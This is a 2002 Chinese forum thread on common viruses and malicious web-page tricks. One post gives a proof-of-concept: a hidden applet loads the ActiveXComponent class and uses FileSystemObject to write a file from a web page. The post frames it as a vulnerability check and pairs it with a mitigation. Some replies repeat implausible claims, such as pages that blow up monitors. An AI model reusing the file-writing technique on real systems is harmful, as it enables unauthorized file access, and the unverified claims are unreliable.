[ 公告] 专题整理 NO.2 ~关于目前常见病毒和网页恶意修改,欢迎大家多多支持!

WingAngel 2002-08-11 12:50:36
UP
...全文
66 25 打赏 收藏 转发到动态 举报
写回复
用AI写文章
25 条回复
切换为时间正序
请发表友善的回复…
发表回复
  • 打赏
  • 举报
回复


上面那个不是鬼(吓人)的吧
KiteGirl 2002-09-01
  • 打赏
  • 举报
回复
另外还有一个极端危险的MIME漏洞,存在于IE 5.0版本上,在IE 5.02 Sp2上修正了这个错误(但是现在官方升级文件已经停止提供了)。至于在IE 6.0上是否存在这个问题我还没有进一步测试。稍后我会尝试写一个恶意代码实验程序,目的在于检测你的机器能否被恶意代码攻击,但这个程序本身不会有任何破坏性质。可以当作一个检验的工具来验证你机器的安全性。
KiteGirl 2002-09-01
  • 打赏
  • 举报
回复
假如下面的代码可以运行,并生成Demo.txt那么就说明你的电脑存在危险。

HTML部分:
<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>
<APPLET NAME=ActCom HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>
</div>

Script部分:
Set AppleObject = document.applets("ActCom")
AppleObject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")
AppleObject.createInstance()
Set FSO = AppleObject.GetObject()
Set F = FSO.OpenTextFile("Demo.txt",2,1)
F.write "可写入信息!"
F.close
KiteGirl 2002-09-01
  • 打赏
  • 举报
回复
解决恶意代码的好办法,现在本人在这里公布:

适用条件:
Windows 98SE以及类似系统。

需要软件:
WinZIP

在C:\WINDOWS\JAVA\Packages下的.zip包里去掉一个叫做:
com\ms\activeX\ActiveXComponent.class的东西。

很多恶意代码就是利用这个漏洞来破坏的。之后你的电脑可以说是百毒不侵了。
WingAngel 2002-08-24
  • 打赏
  • 举报
回复
http://www.haha168.com/pages.htm

这里很有意思`
aple 2002-08-24
  • 打赏
  • 举报
回复
我的主页也带有 恶作剧 代码 来看看啊! :)

http://dstk.8u8.com/ad.htm
awinder 2002-08-17
  • 打赏
  • 举报
回复
要防病毒,其实只要安装防火墙,经常更新病毒库,经常更新安装windows安全补丁(主要针对黑客和恶意网站),一般不会给病毒可称之机的。
如果中了病毒,一般硬盘上的文件都感染同一病毒,首先考虑使用专杀工具,速度快,效果好。
xiaowei_2002 2002-08-15
  • 打赏
  • 举报
回复
朋友帮忙看看我的问题,谢了!

http://www.csdn.net/expert/topic/941/941643.xml?temp=8.576602E-02
WingAngel 2002-08-15
  • 打赏
  • 举报
回复
大家再提一些~
我们就可以整理专题了
zhenhao 2002-08-15
  • 打赏
  • 举报
回复
用好的正版的杀毒软件,要安全许多:)
WingAngel 2002-08-15
  • 打赏
  • 举报
回复
回帖子了~龚胜回的~:)

傻猫现在在家~
xiaowei_2002 2002-08-14
  • 打赏
  • 举报
回复
追月兄,好久不见啊!

笨猫,你还好吗/放假了吧,忙什么呢?还在哈尔滨吗?

发短信能炸手机卡,够狠,只是听说过,还没有亲见呢!我想一定很厉害!
WingAngel 2002-08-13
  • 打赏
  • 举报
回复
还有~现在居然出现的手机短信病毒~

可以让你发短信的时候SIM卡失效。
singtheday 2002-08-13
  • 打赏
  • 举报
回复
要是只是改注册表或是启动组还好一点,最串是哪些网叶,只要你一打开网页,你的硬盘就被FORMAT掉了
还有就是哪些用脚本给你送大礼(病毒)的网页,让人防不了,在公共场所如网吧受害最大
WingAngel 2002-08-12
  • 打赏
  • 举报
回复
我这儿还有许多恐怖的网站~吓死你~

另外,还有改动电压烧主板炸显示器(保险无效的)的网页~
WingAngel 2002-08-12
  • 打赏
  • 举报
回复
http://www.csdn.net/expert/topic/698/698088.xml?temp=.8673212

这是以前小魏的一个帖子~

有谁可以找到恶意修改后的全部症状~请帖上来~谢谢~
WingAngel 2002-08-12
  • 打赏
  • 举报
回复
sorry~
刚去灌过水~没调整过来~

我这儿有吓人的网址
awinder 2002-08-12
  • 打赏
  • 举报
回复
没搞错吧,电脑成炸弹了,改行!改行!不当程序员,要当清洁工,不能被显示器炸死!
rivershan 2002-08-12
  • 打赏
  • 举报
回复
有这样的?是吗?
awinder 2002-08-11
  • 打赏
  • 举报
回复
注册表被修改后,推荐使用毒霸的注册表恢复程序
http://www.iduba.net/download/othertools/Duba_RegSolve.exe
加载更多回复(5)

6,850

社区成员

发帖
与我相关
我的任务
社区描述
Windows 2016/2012/2008/2003/2000/NT
社区管理员
  • Windows Server社区
  • qishine
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧